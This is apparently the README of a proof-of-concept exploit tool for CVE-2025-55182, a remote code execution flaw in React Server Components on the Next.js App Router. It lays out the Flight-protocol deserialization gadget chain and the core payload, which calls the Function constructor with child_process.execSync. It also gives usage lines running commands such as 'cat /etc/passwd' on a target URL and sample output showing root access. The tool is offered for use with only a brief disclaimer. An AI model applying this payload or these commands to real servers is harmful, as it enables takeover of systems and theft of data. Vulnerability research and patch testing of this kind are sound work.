
针对 CVE‑2025‑55182 的 RCE 概念验证,利用 Next.js App Router 上的 React Flight 协议。
作者: rl0x01
CVE-2025-55182 是一个通过 Flight 协议影响 React Server Components 的严重(CVSS 10.0)**远程代码执行(RCE)**漏洞。
| Next.js | React |
|---|---|
| 14.3.0-canary.77 至 15.0.4 | 19.0.0 |
| 15.1.1-canary.0 至 15.1.8 | 19.1.0 |
| 15.2.0-canary.0 至 15.2.5 | 19.1.1 |
| 15.3.0-canary.0 至 15.3.5 | 19.2.0 |
| 15.4.0-canary.0 至 15.4.7 | |
| 15.5.1-canary.0 至 15.5.6 | |
| 16.0.0-canary.0 至 16.0.6 |
| Next.js |
|---|
| 15.0.5、15.1.9、15.2.6、15.3.6、15.4.8、15.5.7、16.0.7+ |
$@ 获取原始 Chunk 引用$1:__proto__:then 将 .then 覆盖为 Chunk.prototype.thenstatus 设置为 resolved_model 以触发 initializeModelChunk$B1337 触发 Blob 反序列化_formData.get 指向 Function 构造函数_prefix 包含要执行的 JS 代码代码通过以下方式执行:
Function("throw new Error(require('child_process').execSync('COMMAND').toString());//1337")
pip install -r requirements.txt
python cve_2025_55182_poc.py https://target.com --check-only
# Default command (id)
python cve_2025_55182_poc.py https://target.com
# Custom command
python cve_2025_55182_poc.py https://target.com -c "whoami"
python cve_2025_55182_poc.py https://target.com -c "cat /etc/passwd"
python cve_2025_55182_poc.py https://target.com -c "dir C:\\"
cd vulnerable-app
npm install
npm run dev
# Server at http://localhost:3000
+======================================================================+
| CVE-2025-55182 - React Server Components RCE |
| React Flight Protocol Deserialization Vulnerability |
+======================================================================+
[*] Affected: React 19.0.0-19.2.0 / Next.js 14.3-16.0.6
[*] CVSS Score: 10.0 (CRITICAL)
[*] Author: rl0x01
[*] Target: http://localhost:3000
[*] Timeout: 15s
[1/2] Checking vulnerability...
[+] VULNERABLE! RCE Confirmed - Output received
[2/2] Executing command: whoami
[+] Payload sent!
============================================================
RESULT: whoami
============================================================
root
============================================================
CVE-2025-55182/
├── cve_2025_55182_poc.py # Main exploit script
├── requirements.txt # Python dependencies
├── README.md # Documentation
└── vulnerable-app/ # Vulnerable Next.js app for testing
├── package.json
├── next.config.js
└── app/
├── layout.js
├── page.js
└── actions.js
⚠️ 本工具仅供教育和授权安全测试目的使用。
未经授权将此工具用于你不拥有或未获明确许可测试的系统是违法的。
| 选项 | 描述 |
|---|
url | 目标 URL(必填) |
-c, --command | 要执行的命令(默认:id) |
--check-only | 仅检查漏洞 |
-t, --timeout | 超时时间(秒)(默认:15) |
-v, --verbose | 详细输出 |
--raw | 显示原始响应 |